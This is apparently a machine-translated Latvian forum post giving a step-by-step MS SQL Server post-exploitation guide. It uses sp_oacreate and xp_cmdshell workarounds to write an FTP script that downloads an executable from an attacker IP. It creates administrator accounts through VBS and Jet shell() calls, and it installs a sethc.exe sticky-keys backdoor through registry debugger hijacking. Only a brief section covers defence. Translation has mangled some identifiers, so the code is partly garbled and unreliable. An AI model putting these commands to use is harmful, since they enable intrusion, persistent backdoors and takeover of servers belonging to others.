exec sp_oacreate 'scrip noņemt ting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'C:\1.bat', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'open IP'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'ftp konts'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'ftp parole'
exec @ret = sp_oamethod @f, 'writeline', NULL, 'get en.exe (bez neto eskalācijas skripta) c:\en.exe'
exec @ret = sp_oamethod @f, 'writeline', NULL,'bye'
Pēc tam, kad vaicājumu analizators ir veiksmīgi izpildīts, C diskā parādīsies 1.bat (ja izpilde ir veiksmīga, bet C diska nav, varat mainīt mapi, lai rakstītu, jo kura servera C diska saknes direktorija aizliedz rakstīt)
Tad cmd izpilda ftp -s:c:\1.bat
Pēc tam, kad tas ir izpildīts, jūs lejupielādēsiet ne-tīkla eskalācijas skriptu CFT diskā FTP vai tieši uzrakstīsiet VBS eskalācijas skriptu
deklarēt @o int, @f int, @t int, @ret int
exec sp_oacreate 'scrip noņemt ting.filesystemobject', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\1.vbs', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set o=CreateObject( "Shell.Users" )'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set z=o.create('user")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'z.changePassword "parole","'
exec @ret = sp_oamethod @f, 'writeline', NULL,'z.setting("AccountType")=3'
Pēc tam cmd izpilda cscrip, lai noņemtu t c:\1.vbs
4. Iepriekšējais tiek labots, lai izpildītu cmd komandas, bet pēc dažiem remontiem parādīsies jaunas problēmas
(1) Ziņojums: xp_cmdshell izpildes laikā radās kļūda. Izsaukums 'CreateProcess' neizdevās ar kļūdas kodu: '5'.
Kļūda 5 ir kļūdas numurs, ko izraisa sistēma, CreateProcess ir pavediena izveides nozīme, šai kļūdu ģenerēšanai ir liels sakars ar sistēmas failu cmd.exe, viens ir tas, ka cmd tiek izdzēsts, otrs ir tas, ka cmd atļauja ir samazināta.
SQL, lai pārbaudītu termināļa portus un atvērto statusu:
izpildmeistars .. xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
Labi, galvenais punkts zemāk ir izmantot divas SQL instrukcijas, lai kopētu sistēmas pārlūkprogrammas failu sistēmas maiņas aizmugurējā failā, un šādi divi paziņojumi tiek izpildīti atsevišķi.
Šis paziņojums kopē explorer.exe kā sethc.exe
declare @o int exec sp_oacreate 'scripremove ting.filesystemobject', @o out exec sp_oamethod @o, 'copyfile',null,'c:\windows\explorer.exe','c:\windows\system32\sethc.exe';
Šis paziņojums kopē sethc.exe direktorijā dllcache
declare @oo int exec sp_oacreate 'scrip remove ting.filesystemobject', @oo out exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\sethc.exe','c:\windows\system32\dllcache\ sethc.exe";
Pārējie divi paziņojumi izmanto sp_oacreate saglabātas procedūras, kurām jāizmanto odsole70.dll fails, tāpēc šī faila izdzīvošana ir saistīta ar tā izveides panākumiem.
(2), xpsql.cpp: 5. kļūda no CreateProcess (737. rinda)
Šī situācija ir sarežģītāka, un tas ir teikts internetā
EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0
Atlasiet * no OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net user 123 123 /add")');
Atlasiet * no OpenRowSet('Microsoft.Jet.OLEDB.4.0','; Database=c:\windows\system32\ias\ias.mdb','select shell("net localgroup administrators 123 /add")');
Es pārbaudīju smilšu kasti, lai paaugstinātu tiesības šajā jautājumā, bet manā praksē šis panākumu līmenis ir ļoti zems, jo lielākā daļa serveru ir izdzēsuši c:\windows\system32\ias\ias.mdb. Tad jūs varat izmēģināt attēlu nolaupīšanu sethc, protams, attēlu nolaupīšana ir arī nosacīta, 1 pastāvēt xp_regwrite šī saglabātā procedūra 2 ir 'HKEY_LOCAL_MACHINE', 'SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File Execution Options \ sethc.exe'," Atkļūdotājs" nav izdzēsts
Vispirms varat vaicāt, vai reģistra pielīmētā atslēga ir nolaupīta
izpildmeistars .. xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'
Ja uzvedne neatrod problēmu, pierādījums tiek izdzēsts, nav iespējams izpildīt sql komandu sethc.exe ja tiek prasīts izpildīt sql komandu
EXEC meistars .. xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='PROGRAMMATŪRA\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc. EXE",
@value_name='Atkļūdotājs',
@type='REG_SZ',
@value='C:\WINDOWS\explorer.exe'
Pēc 5 reizes savienojuma ar termināli un pārvietošanas tas nonāk tieši darbvirsmā un pēc tam pievieno to manuāli.
Reģistrs modificē termināļa portu
[HKEY_LOCAL_MACHINE SYSTEM CurrentControlSet Control Terminal Server Wds rdpwd Tds tcp]
HKEY_LOCAL_MACHINE \ SYSTEM \ CurrentControlSet \ Control \ Terminal Server \ WinStations \ RDP-Tcp,
Attiecībā uz attēlu nolaupīšanas novēršanu tas galvenokārt tiek panākts, izmantojot šādas metodes:
★ Atļauju ierobežošanas likums
Ja lietotājam vairs nav piekļuves reģistra atslēgai, tas nevar modificēt šīs lietas. Atveriet reģistra redaktoru un dodieties uz HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows
NT \ Pašreizējā versija \ Attēla faila izpildes opcijas, atlasiet šo vienumu, ar peles labo pogu noklikšķiniet uz > atļaujas - > papildu un samaziniet administratora un sistēmas lietotāju atļaujas (šeit jums vienkārši jāatceļ rakstīšanas operācija).
★ Ātra nažu griešana nekārtīga kaņepju metode
Atveriet reģistra redaktoru un dodieties uz joslu
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
Problēmu var atrisināt, tieši izdzēšot vienumu Attēla faila izpildes opcijas.
SQL komanda nolaupa reģistra lipīgo atslēgu instalēšanu backdoor
xp_regwrite 'HKEY_LOCAL_MACHINE', 'PROGRAMMATŪRA\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe',
'Atkļūdotājs','REG_SZ','C:\WINDOWS\system32\kdsn.exe'
Programmatūras lejupielāde:Tūristi, ja vēlaties redzēt šīs ziņas slēpto saturu, lūdzu Atbildi
|
Publicēts 18.03.2015 10:36:56
|
|
|
|
Publicēts 19.03.2015 20:26:09
|
